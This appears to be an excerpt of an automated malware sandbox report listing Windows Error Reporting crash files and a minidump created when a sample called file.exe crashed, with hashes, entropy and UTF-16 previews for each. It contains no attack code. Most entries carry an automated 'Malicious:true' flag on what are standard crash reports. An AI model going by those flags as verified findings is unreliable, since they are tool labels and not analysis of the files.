                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.6.8.3.2.9.6.3.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.0.4.c.2.b.7.-.5.8.8.e.-.4.b.f.c.-.9.b.c.f.-.2.0.2.2.4.2.6.b.7.2.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.6.3.0.e.1.9.-.3.c.a.0.-.4.b.5.9.-.b.2.2.1.-.5.0.d.e.0.1.1.5.5.4.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_0b008542\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8370796279502537
                                                      Encrypted:false
                                                      SSDEEP:192:/Dd5zCfavNqH56rIP3jDB/u7slS274ItmOBx:JlA56rQjl/u7slX4ItR
                                                      MD5:6B2627A03A29E859FBFD5C78873EFE9D
                                                      SHA1:0BF0993533912B4239325CD4D02ED611C43D6129
                                                      SHA-256:C1F54F479E6C9682319E976996562F60FCF56F8435CB714BC8B427DA4F359B32
                                                      SHA-512:2FF6BB6CD152DD07AEFE09F7597DD92D34E8BE8669A8D9D691C470D9ACC465E61557EFDD6BEC9064490B4266CCAD3459C1CE0EDD8148A28B78FA3D35798FBAB3
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.3.9.8.6.1.3.5.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.c.2.f.5.6.2.-.b.6.1.1.-.4.6.c.8.-.8.4.5.7.-.c.7.d.6.8.4.7.3.3.1.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.e.2.f.8.9.d.-.e.e.0.5.-.4.3.a.8.-.9.a.c.0.-.e.3.f.4.6.a.f.a.c.6.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_0d406b90\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8371767119643627
                                                      Encrypted:false
                                                      SSDEEP:192:9zCfavyqH56rIP3jDB/u7slS274ItmOBxi:JZ56rQjl/u7slX4ItR
                                                      MD5:1116488D2B9F3DE484239E6F5AFA4329
                                                      SHA1:442EE10039A605C8D88A855DC86346C0B6F957A7
                                                      SHA-256:4D1AB0A72E39612EF891FB8C18271DAA6E7E84E832D55D271C5FD2E08EF03803
                                                      SHA-512:424EA16B84EC5D8C1964443160626242FF53D807A483B4DAB012B081DB66A1536F5DFC578199EEC7BD58680172C59F6DC4340A0E713D056F1585A99DD6105A16
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.3.8.9.6.4.5.4.1.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.6.3.1.7.4.6.-.3.0.5.1.-.4.d.3.5.-.b.6.d.5.-.c.6.2.8.a.1.d.3.7.c.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.e.a.0.f.e.9.-.e.a.d.c.-.4.0.d.d.-.9.d.3.3.-.b.9.a.a.8.c.1.a.e.e.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_0ee88fc2\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8371606978605497
                                                      Encrypted:false
                                                      SSDEEP:192:Q6zCfavuqH56rIP3jDB/u7slS274ItmOBx:QQ156rQjl/u7slX4ItR
                                                      MD5:DDD9068F4C24D1FCB12802CF6932C5DE
                                                      SHA1:1DD2AFA7F150C1A0D854278DAF93510B7B17E88E
                                                      SHA-256:E229C5271103691764565DEFA78E849BFFF563DA7F8C17E2F0C9DAE5CF3D0FE4
                                                      SHA-512:9F25579ABC41D32EEEA3F50AEA26BB375DA56EFA1C17774844E92D425BAC6D4DB43CB2288A7387C9499280BD3FD1345A75DB0BB3BE39973060A410202EDD2EF5
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.0.1.3.6.4.8.8.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.3.0.7.9.9.c.-.d.1.f.8.-.4.5.f.0.-.b.d.d.2.-.0.1.4.4.d.9.c.5.a.7.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.7.5.9.3.c.8.-.2.3.8.4.-.4.f.0.2.-.9.4.a.c.-.d.6.a.1.c.6.f.f.6.8.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_146c4ac9\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8229995583664064
                                                      Encrypted:false
                                                      SSDEEP:192:bGzCfavgqH56rIP3jDk/u7slS274ItmOBx:b8/56rQjg/u7slX4ItR
                                                      MD5:4E299B284680A9A14C303E3819A6CEE5
                                                      SHA1:1C3A76524DEC72ECF002DDAAB574173EDCA59EAA
                                                      SHA-256:FEF5CB6B1C5AB1CC3B823594BAE239AED7B306DC1E497EA58569CBA13128EE38
                                                      SHA-512:36CA4A86E32EA44A447FC034ACD386C6F8CE37BDCA54F6353E6632F75CD5B30BA455846B914E22A01E0502D821874279DC86665DBD626330FE57EFB7F44ECE40
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.3.8.3.3.6.3.5.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.8.5.a.8.9.a.-.9.c.7.e.-.4.8.6.3.-.8.6.e.1.-.b.c.d.a.4.e.5.4.1.d.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.d.2.f.3.6.e.-.e.a.0.8.-.4.0.5.9.-.9.e.8.e.-.e.0.8.d.f.f.2.6.c.f.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_147c56fe\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8372423344232678
                                                      Encrypted:false
                                                      SSDEEP:192:59zCfavbqH56rIP3jDB/u7slS274ItmOBx:3G56rQjl/u7slX4ItR
                                                      MD5:5079B5AFC88C86A3162BD54A427E6A83
                                                      SHA1:C7ADE5452CBF8A54148C072A2A67BAD2534FD4FF
                                                      SHA-256:E1B35E4671403F26277046E345E64476FFB2FEB48D08B298ACA77469C9E29B37
                                                      SHA-512:103EE2B2C16B8689DF8F7E987E8E426B43F968212EA3D682421D3589819C96C484F41E11A9C01C17DE3B2A419201A8B8F8C9C8DA0E33CAD0D99A3BAA7FEB77A0
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.3.8.6.6.4.0.4.0.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.2.6.a.a.b.3.-.2.5.6.e.-.4.f.7.f.-.a.7.f.1.-.8.d.2.b.7.c.9.b.7.d.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.f.2.8.2.0.6.-.6.1.2.2.-.4.c.c.8.-.9.9.7.2.-.c.0.f.a.1.a.f.5.9.a.2.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_14851770\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9136302872278061
                                                      Encrypted:false
                                                      SSDEEP:192:2zCfavGqH56rIP3jDyc/u7sKS274ItmOBxl:M956rQjD/u7sKX4ItR
                                                      MD5:948F44A5E14828BB69345D5FD43809EE
                                                      SHA1:FD20135487A864B4EC9732908F76B881CEA2E8D1
                                                      SHA-256:F90CA7BD187AC8650580CCE0C34FFAB77C1E802BB2C0978D6789BD6460E0EA15
                                                      SHA-512:9D7B4E609F5FE919E7B18F2C986ED578546918852A40CCE5E2168D38A6F5D7D51B3D565ADB401CB5FD598E3382B16EED3454AAFDE471674E62CDB9DA63347A0E
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.3.6.0.0.1.7.8.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.5.4.a.2.0.8.-.b.1.7.d.-.4.4.f.1.-.8.5.1.a.-.7.6.5.1.1.5.e.3.f.3.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.4.9.e.8.7.d.-.e.e.d.0.-.4.3.4.9.-.b.7.5.f.-.1.9.b.4.e.4.d.c.d.8.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_160c9d5e\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8601420861951884
                                                      Encrypted:false
                                                      SSDEEP:192:75czCfavjqH56rIP3jDm/u7slS274ItmOBx:756e56rQjC/u7slX4ItR
                                                      MD5:89F88B5DA16158C43355B04A29FFCEAC
                                                      SHA1:C389E8DDE985EF13A52B62495E62EBABDEE1A93B
                                                      SHA-256:3EFD591015300CF448823807DC7EDF66D856026627F17F7CE1C81BF23247BC12
                                                      SHA-512:99457DF4DCEC0E9851505312D11489FF7663BD225BF23DB64F29D0C8E0F13554E261BC55D819AC97DCEF604C252505769AD62FEC5938BF716036A190014123FC
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.0.4.6.4.8.5.5.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.4.a.7.9.d.e.-.a.2.2.c.-.4.f.f.2.-.9.d.e.f.-.2.e.8.c.d.d.6.a.e.9.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.2.c.a.2.8.1.-.3.0.2.9.-.4.a.c.0.-.b.4.1.1.-.3.d.7.3.e.7.0.d.2.b.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_1688a9a3\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.879641008331665
                                                      Encrypted:false
                                                      SSDEEP:192:C6gzCfavbqH56rIP3jDym/u7slS274ItmOBx:ClG56rQjJ/u7slX4ItR
                                                      MD5:A7445F71E5EA7D31723ED8476E2827B5
                                                      SHA1:985A9DC7364FB9B306F235AE18AC67824D089813
                                                      SHA-256:B8F5B677C061CBF684FED9DAF455670B6D44880182A9479BE4E5A4705BBE6FDF
                                                      SHA-512:D346FD5535698B0D3520485B663ACB621E0857C08B72D5BC93ACEFB35F8C987D15F8BA4F994F20826B97A76CD643685DF58A6FED449A9548821E351724414C4C
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.0.8.0.3.7.7.7.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.a.0.4.5.d.f.-.e.7.c.d.-.4.6.c.1.-.a.a.5.f.-.0.9.9.2.e.e.6.d.9.2.6.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.8.6.3.4.7.a.-.d.b.9.a.-.4.2.f.6.-.9.e.b.0.-.d.8.5.2.9.f.e.f.d.2.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_aa89147a1632e1dc9dc974cd4d3dc4b44506e_440dec59_1774bb65\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8934864854284043
                                                      Encrypted:false
                                                      SSDEEP:192:ia5zCfavNqH56rIP3jDyH/u7slS274ItmOBx:vlA56rQj4/u7slX4ItR
                                                      MD5:7B3ED841AAEC5009A8607EDA6AC34F7B
                                                      SHA1:7BA012B5D7F686446C7850E5C00CC2DC29A59B27
                                                      SHA-256:81E53F4961508CBC9AEF58852E0C4C77B48447BF0D9EE36A1EBA776AF974671F
                                                      SHA-512:AE9DBD5899ACC796D3E617C789B1B86B69784D77920A38969C1147BC5E45B40B429AFE3245985D587D642968F72774162850CCC547C3D7B39AEBAF0BB0FBA88B
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.4.1.0.9.8.1.7.5.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.9.b.3.0.8.2.-.a.6.4.5.-.4.b.4.7.-.9.8.7.d.-.5.4.1.e.5.5.6.d.9.4.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.b.2.c.3.1.7.-.4.6.9.6.-.4.8.1.b.-.8.1.a.3.-.e.7.e.1.4.1.c.1.e.4.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.8.-.0.0.0.1.-.0.0.1.a.-.1.7.e.6.-.5.4.f.c.8.6.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER125F.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:20:36 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):122304
                                                      Entropy (8bit):2.1225713297905444
                                                      Encrypted:false
                                                      SSDEEP:384:neDv1SLD8PL+oem37nqtj39YqjZ4FZOm2JtoqSl/1lr2iyhQOB2qVpL:K19PLPO5VCZOm2XSlNPyyYhVp
                                                      MD5:8B6682CFB170FA06226548BFBEC32A3C
                                                      SHA1:5F3D79263CC9A680764F1F4767E4F8272DF62FF1
                                                      SHA-256:E3A38F2986671E2CEBF626C724C51D59064857CB00D7C83DD260B70FB80C6796
                                                      SHA-512:5A5D093C3C5AAC660054EC8BBF363812AE28A54BB02001BAD35CA6DB44FC68AB36E4DFF518517407D1F5D76F95AE771E6FC62347BAFAD4CA15C092808572E27E
                                                      Malicious:false
                                                      Preview:MDMP....... .......T|;c............t...............|...........nL..........T.......8...........T...........82..............T...........@....................................................................U...........B..............GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14F0.tmp.WERInternalMetadata.xml

                                                      Download File
